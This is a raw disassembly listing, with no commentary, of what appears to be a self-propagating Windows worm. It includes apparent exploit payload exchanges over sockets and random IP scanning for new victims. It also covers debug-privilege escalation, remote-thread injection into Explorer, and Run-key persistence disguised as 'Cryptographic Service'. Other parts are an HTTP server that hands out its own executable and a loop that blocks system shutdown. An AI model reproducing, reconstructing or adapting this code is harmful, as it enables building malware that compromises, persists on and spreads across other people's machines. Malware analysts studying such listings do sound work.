mov esi, dword_31421094
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_31421168
push 89h
push offset dword_31424580
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0A8h
push offset dword_3142460C
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0DEh
push offset dword_314246B8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
cmp eax, 46h
jl loc_31421D4C
cmp [ebp+var_730], 31h
jnz loc_31421BF7
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
push offset byte_314242B8
call dword_31421084 ; lstrlen
push eax
lea eax, [ebp+var_EA4]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_31421084 ; lstrlen
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31422CE2 ; memcpy
mov eax, dword_31424BBE
add esp, 0Ch
mov [ebp+var_798], eax
loc_31421A98: ; CODE XREF: sub_31421801+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 68h
push offset dword_314247FC
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0A0h
push offset dword_31424868
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
cmp [ebp+arg_0], 0
jz loc_31421CE7
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31424A20
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31422CE2 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31424A8C
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31422CE2 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31424B00
push eax
call sub_31422CE2 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31421D3F
; ---------------------------------------------------------------------------
loc_31421BF7: ; CODE XREF: sub_31421801+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31422CD6 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31424BF8
push eax
call sub_31422CE2 ; memcpy
push offset byte_314242B8
call sub_31422CDC ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31424C70
push eax
call sub_31422CE2 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31424BF8
push eax
call sub_31422CE2 ; memcpy
add esp, 40h
push offset byte_314242B8
call sub_31422CDC ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31421C93: ; CODE XREF: sub_31421801+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31421C93
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31422CD6 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31422CD6 ; memset
add esp, 18h
jmp loc_31421A98
; ---------------------------------------------------------------------------
loc_31421CE7: ; CODE XREF: sub_31421801+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_3142490C
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31422CE2 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_3142498C
push eax
call sub_31422CE2 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31421D3F: ; CODE XREF: sub_31421801+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_31421D4C: ; CODE XREF: sub_31421801+1AD�j
; sub_31421801+1E1�j ...
push 2
push [ebp+var_4]
call dword_31421170 ; shutdown
loc_31421D57: ; CODE XREF: sub_31421801+166�j
push [ebp+var_4]
call dword_31421174 ; closesocket
pop esi
loc_31421D61: ; CODE XREF: sub_31421801+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31421801 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421D68 proc near ; CODE XREF: UPX0:loc_31422376�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_314210A8 ; LoadLibraryA
mov esi, dword_314210A4
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_31421DEC
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_31421DEC
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_31421DEC
lea eax, [ebp+var_C]
push eax
push 20h
call dword_314210A0 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31421DEC: ; CODE XREF: sub_31421D68+28�j
; sub_31421D68+37�j ...
pop edi
pop esi
leave
retn
sub_31421D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421DF0 proc near ; CODE XREF: UPX0:3142238A�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31425000
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_314210B4 ; GetModuleHandleA
mov esi, dword_314210A4
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31421E37
loc_31421E33: ; CODE XREF: sub_31421DF0+54�j
push 1
jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E37: ; CODE XREF: sub_31421DF0+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_31421E33
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31421110 ; FindWindowA
test eax, eax
jnz short loc_31421E65
call dword_31421114 ; GetForegroundWindow
test eax, eax
jnz short loc_31421E65
push 2
jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E65: ; CODE XREF: sub_31421DF0+65�j
; sub_31421DF0+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31421118 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_314210B0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31421E8B
push 3
loc_31421E88: ; CODE XREF: sub_31421DF0+45�j
; sub_31421DF0+73�j
pop eax
jmp short loc_31421EF6
; ---------------------------------------------------------------------------
loc_31421E8B: ; CODE XREF: sub_31421DF0+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_3142107C
test eax, eax
jz short loc_31421EE9
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_314210AC ; WriteProcessMemory
push dword_31424FF4
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31421ED5
push eax
call esi ; CloseHandle
jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421ED5: ; CODE XREF: sub_31421DF0+DE�j
push offset aUterm192 ; "uterm19-2"
call sub_31421F29
pop ecx
mov [ebp+var_4], 5
jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421EE9: ; CODE XREF: sub_31421DF0+B2�j
mov [ebp+var_4], 4
loc_31421EF0: ; CODE XREF: sub_31421DF0+E3�j
; sub_31421DF0+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_31421EF6: ; CODE XREF: sub_31421DF0+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421EFB proc near ; CODE XREF: sub_314221C4+B�p
; UPX0:3142234C�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_314210B8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_314210EC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421EFB endp
; =============== S U B R O U T I N E =======================================
sub_31421F29 proc near ; CODE XREF: sub_31421DF0+EA�p
; UPX0:31422356�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_314210BC ; CreateMutexA
retn
sub_31421F29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421F38 proc near ; CODE XREF: sub_314223B2+155�p
; sub_314223B2+160�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314210C0 ; CreateThread
pop ebp
retn
sub_31421F38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421F52 proc near ; CODE XREF: sub_314221C4+12C�p
; sub_314225C3+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314210C0 ; CreateThread
push eax
call dword_3142107C ; CloseHandle
pop ebp
retn
sub_31421F52 endp
; =============== S U B R O U T I N E =======================================
sub_31421F73 proc near ; CODE XREF: sub_314211A0+68�p
; sub_31422A9B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31421F9B
loc_31421F84: ; CODE XREF: sub_31421F73+26�j
call dword_314210FC ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31421F84
loc_31421F9B: ; CODE XREF: sub_31421F73+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31421F73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FA3 proc near ; CODE XREF: sub_314211A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31422CD6 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_314210C4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_3142107C
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31421FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FF9 proc near ; CODE XREF: sub_3142264B+3E�p
; sub_31422712+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3142114C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_3142201A
call dword_31421150 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_3142201A: ; CODE XREF: sub_31421FF9+15�j
lea eax, [ebp+var_34]
push eax
call dword_31421154 ; gethostbyname
test eax, eax
jnz short loc_3142202F
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_3142202F: ; CODE XREF: sub_31421FF9+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31421FF9 endp
; =============== S U B R O U T I N E =======================================
sub_31422038 proc near ; CODE XREF: sub_314216A2+12�p
; sub_3142255F+22�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31421130 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31422038 endp
; =============== S U B R O U T I N E =======================================
sub_3142204E proc near ; CODE XREF: sub_314223B2+E6�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_314210CC ; OpenEventA
test eax, eax
jz short locret_31422067
push eax
call dword_314210C8 ; SetEvent
locret_31422067: ; CODE XREF: sub_3142204E+10�j
retn
sub_3142204E endp
; =============== S U B R O U T I N E =======================================
sub_31422068 proc near ; CODE XREF: sub_314216A2+68�p
push esi
mov esi, dword_314210FC
push edi
call esi ; rand
mov edi, eax
shl edi, 10h
call esi ; rand
or eax, edi
pop edi
pop esi
retn
sub_31422068 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142207E proc near ; DATA XREF: sub_314221C4+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_314220AF
push 1
jmp loc_3142216A
; ---------------------------------------------------------------------------
loc_314220AF: ; CODE XREF: sub_3142207E+28�j
mov esi, dword_31421104
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_3142217A
lea eax, [ebp+var_100]
push offset dword_314241F0
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_3142217A
mov esi, dword_31421168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push dword_31424FF0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31422CDC ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_3142212C: ; CODE XREF: sub_3142207E+E8�j
mov eax, dword_31424FF0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_3142213E
mov eax, ecx
loc_3142213E: ; CODE XREF: sub_3142207E+BC�j
test eax, eax
jz short loc_3142216D
push 0
push eax
mov eax, dword_31424FE8
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_31422168
cmp eax, 1000h
jb short loc_3142216D
push 64h
add edi, eax
call dword_31421094 ; Sleep
jmp short loc_3142212C
; ---------------------------------------------------------------------------
loc_31422168: ; CODE XREF: sub_3142207E+D5�j
push 2
loc_3142216A: ; CODE XREF: sub_3142207E+2C�j
pop eax
jmp short loc_314221BD
; ---------------------------------------------------------------------------
loc_3142216D: ; CODE XREF: sub_3142207E+C2�j
; sub_3142207E+DC�j
push offset dword_31424FEC
call dword_314210D4 ; InterlockedIncrement
jmp short loc_31422198
; ---------------------------------------------------------------------------
loc_3142217A: ; CODE XREF: sub_3142207E+49�j
; sub_3142207E+61�j
mov esi, dword_31421168
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_31424D3C
push ebx
call esi ; send
loc_31422198: ; CODE XREF: sub_3142207E+FA�j
push 7D0h
call dword_31421094 ; Sleep
push 2
push ebx
call dword_31421170 ; shutdown
push ebx
call dword_31421174 ; closesocket
push 0
call dword_314210D0 ; ExitThread
xor eax, eax
loc_314221BD: ; CODE XREF: sub_3142207E+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_3142207E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314221C4 proc near ; DATA XREF: sub_314223B2+150�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_31421EFB
lea eax, [ebp+var_130]
push 104h
push eax
push offset aCryptographicS ; "Cryptographic Service"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31424FEC, ebx
call sub_31422882
add esp, 14h
test eax, eax
jnz loc_314222F9
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_31421080 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31422230
push 1
call dword_314210D0 ; ExitThread
loc_31422230: ; CODE XREF: sub_314221C4+62�j
push ebx
push esi
call dword_314210DC ; GetFileSize
push eax
mov dword_31424FF0, eax
call sub_31422CA5
pop ecx
mov dword_31424FE8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31424FF0
push eax
push esi
call dword_314210D8 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31424FF0, eax
call dword_3142107C ; CloseHandle
push ebx
push 1
push 2
call dword_31421158 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31422292: ; CODE XREF: sub_314221C4+E5�j
; sub_314221C4+ED�j ...
call dword_314210FC ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_31424FFC, eax
jz short loc_31422292
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31422292
push eax
call dword_31421160 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31421140 ; bind
test eax, eax
jnz short loc_31422292
push 64h
push edi
call dword_31421144 ; listen
mov [ebp+var_8], esi
pop esi
loc_314222DB: ; CODE XREF: sub_314221C4+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31421148 ; accept
push eax
push offset sub_3142207E
call sub_31421F52
pop ecx
pop ecx
jmp short loc_314222DB
; ---------------------------------------------------------------------------
loc_314222F9: ; CODE XREF: sub_314221C4+3D�j
push ebx
call dword_314210D0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_314221C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422308 proc near ; CODE XREF: sub_314223B2:loc_314224FC�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3142113C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_31422308 endp
; ---------------------------------------------------------------------------
loc_31422334: ; CODE XREF: UPX1:31427D08�j
push 0
call dword_314210B4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31425000, eax
call dword_31421074 ; DeleteFileA
call sub_31421EFB
push offset aUterm192 ; "uterm19-2"
call sub_31421F29
pop ecx
mov dword_31424FF4, eax
call dword_314210E4 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31422376
push 1
call dword_314210E0 ; ExitProcess
loc_31422376: ; CODE XREF: UPX0:3142236C�j
call sub_31421D68
call sub_314229E6
call sub_31422B67
push offset sub_314223B2
call sub_31421DF0
test eax, eax
pop ecx
jz short loc_3142239B
push 0
call sub_314223B2
loc_3142239B: ; CODE XREF: UPX0:31422392�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_3142239E proc near ; CODE XREF: sub_314223B2:loc_31422525�p
; sub_3142255F:loc_31422578�p ...
push 0
push dword_31424FF8
call dword_31421070 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_3142239E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314223B2 proc near ; CODE XREF: UPX0:31422396�p
; DATA XREF: UPX0:31422385�o
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421190
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 64h
push ebx
push esi
push edi
mov [ebp+var_70], offset aU10x ; "u10x"
mov [ebp+var_6C], offset aU11x ; "u11x"
mov [ebp+var_68], offset aU12x ; "u12x"
mov [ebp+var_64], offset aU13x ; "u13x"
mov [ebp+var_60], offset aU14x ; "u14x"
mov [ebp+var_5C], offset aU15x ; "u15x"
mov [ebp+var_58], offset aU16x ; "u16x"
mov [ebp+var_54], offset aU17x ; "u17x"
mov [ebp+var_50], offset aU18x ; "u18x"
mov [ebp+var_4C], offset aU8 ; "u8"
mov [ebp+var_48], offset aU9 ; "u9"
mov [ebp+var_44], offset aU10 ; "u10"
mov [ebp+var_40], offset aU11 ; "u11"
mov [ebp+var_3C], offset aU12 ; "u12"
mov [ebp+var_38], offset aU13 ; "u13"
mov [ebp+var_34], offset aU13i ; "u13i"
mov [ebp+var_30], offset aU14 ; "u14"
mov [ebp+var_2C], offset aU15 ; "u15"
mov [ebp+var_28], offset aU16 ; "u16"
mov [ebp+var_24], offset aU17 ; "u17"
mov [ebp+var_20], offset aU18 ; "u18"
mov [ebp+var_1C], offset aU19 ; "u19"
push offset aU192x ; "u19-2x"
xor edi, edi
push edi
push 1
push edi
call dword_3142106C ; CreateEventA
mov dword_31424FF8, eax
mov [ebp+var_4], edi
mov [ebp+var_74], edi
loc_3142248B: ; CODE XREF: sub_314223B2+EF�j
cmp [ebp+var_74], 9
jnb short loc_314224A3
mov eax, [ebp+var_74]
push [ebp+eax*4+var_70]
call sub_3142204E
pop ecx
inc [ebp+var_74]
jmp short loc_3142248B
; ---------------------------------------------------------------------------
loc_314224A3: ; CODE XREF: sub_314223B2+DD�j
mov [ebp+var_74], edi
loc_314224A6: ; CODE XREF: sub_314223B2+10A�j
cmp [ebp+var_74], 0Dh
jnb short loc_314224BE
mov eax, [ebp+var_74]
push [ebp+eax*4+var_4C]
call sub_31421F29
pop ecx
inc [ebp+var_74]
jmp short loc_314224A6
; ---------------------------------------------------------------------------
loc_314224BE: ; CODE XREF: sub_314223B2+F8�j
cmp [ebp+arg_0], edi
jz short loc_314224FC
push offset aWs2_32 ; "ws2_32"
mov esi, dword_314210A8
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm192 ; "uterm19-2"
call sub_31421F29
pop ecx
mov dword_31424FF4, eax
loc_314224FC: ; CODE XREF: sub_314223B2+10F�j
call sub_31422308
push edi
push offset sub_314221C4
call sub_31421F38
push edi
push offset sub_314216A2
call sub_31421F38
push edi
push offset loc_3142276E
call sub_31421F38
add esp, 18h
loc_31422525: ; CODE XREF: sub_314223B2+18E�j
call sub_3142239E
test eax, eax
jnz short loc_31422542
push edi
call dword_31421018 ; AbortSystemShutdownA
push 1388h
call dword_31421094 ; Sleep
jmp short loc_31422525
; ---------------------------------------------------------------------------
loc_31422542: ; CODE XREF: sub_314223B2+17A�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_314223B2 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142255F proc near ; DATA XREF: sub_314225C3+55�o
; sub_3142264B+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_3142256E
push 1
pop eax
jmp short locret_314225BF
; ---------------------------------------------------------------------------
loc_3142256E: ; CODE XREF: sub_3142255F+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_31422578: ; CODE XREF: sub_3142255F+5A�j
call sub_3142239E
test eax, eax
jnz short loc_314225BB
call sub_31422038
test eax, eax
jz short loc_314225BB
cmp [ebp+var_1], bl
jz short loc_314225B4
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_31421801
movzx esi, word_3142500C
pop ecx
call dword_314210FC ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_31421094 ; Sleep
loc_314225B4: ; CODE XREF: sub_3142255F+2E�j
inc bl
cmp bl, 0FFh
jb short loc_31422578
loc_314225BB: ; CODE XREF: sub_3142255F+20�j
; sub_3142255F+29�j
pop esi
xor eax, eax
pop ebx
locret_314225BF: ; CODE XREF: sub_3142255F+D�j
leave
retn 4
sub_3142255F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314225C3 proc near ; DATA XREF: sub_3142264B+7E�o
; UPX0:31422803�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_314225D1
push 1
pop eax
jmp short loc_31422647
; ---------------------------------------------------------------------------
loc_314225D1: ; CODE XREF: sub_314225C3+7�j
push ebx
push esi
push edi
call sub_31421EFB
mov esi, dword_314210FC
xor ebx, ebx
loc_314225E1: ; CODE XREF: sub_314225C3+7D�j
call sub_3142239E
test eax, eax
jnz short loc_31422642
call sub_31422038
test eax, eax
jz short loc_31422642
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
